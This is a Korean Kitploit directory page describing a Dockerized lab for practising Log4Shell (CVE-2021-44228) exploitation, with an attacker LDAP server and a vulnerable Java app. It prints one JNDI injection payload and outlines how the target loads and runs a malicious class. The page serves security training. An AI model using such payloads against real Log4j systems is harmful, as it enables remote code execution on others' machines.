Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228_dockernize — Dockerized lab environment for safely practicing CVE-2021-44228 (Log4Shell) exploitation. Includes attacker LDAP server and vulnerable Java application for custom payload testing. | Kitploit
도구/GitHubGitHub/qw3rtyou/cve-2021-44228_dockernize
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubqw3rtyou/cve-2021-44228_dockernize

CVE-2021-44228_dockernize

Dockerized lab environment for safely practicing CVE-2021-44228 (Log4Shell) exploitation. Includes attacker LDAP server and vulnerable Java application for custom payload testing.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
111년 전아직 검토되지 않음

CVE-2021-44228 (Log4Shell) 취약점 실습 환경

소개

이 프로젝트는 CVE-2021-44228 (Log4Shell)로 알려진 심각한 Log4j 취약점을 안전하게 실습하고 이해할 수 있는 도커화된 환경을 제공합니다.

주요 기능

  • 안전한 도커화된 테스트 환경
  • 사용자 정의 페이로드 테스트 기능
  • 공격자의 LDAP 서버 및 취약한 Java 애플리케이션 포함

시작하기

root@kitploit:~
docker compose up --build

페이로드 테스트

  1. /vulnerable/Makefile의 test 섹션에서 페이로드를 수정할 수 있습니다.
  2. 기본 페이로드는 $${jndi:ldap://127.0.0.1:10000/}를 사용합니다.

작동 방식

  1. 취약한 Java 애플리케이션이 시작됩니다.
  2. 공격자의 LDAP 서버가 10000 포트에서 수신 대기합니다.
  3. 취약한 애플리케이션이 실행됩니다.
  4. Log4Shell 페이로드가 Makefile 테스트 섹션을 통해 취약한 애플리케이션에 기록됩니다.
  5. 취약한 애플리케이션이 JNDI LDAP 조회를 시도합니다.
  6. LDAP 서버가 악성 Java 클래스를 반환합니다.
  7. 취약한 애플리케이션이 이 클래스를 로드하고 실행합니다.
도구 다운로드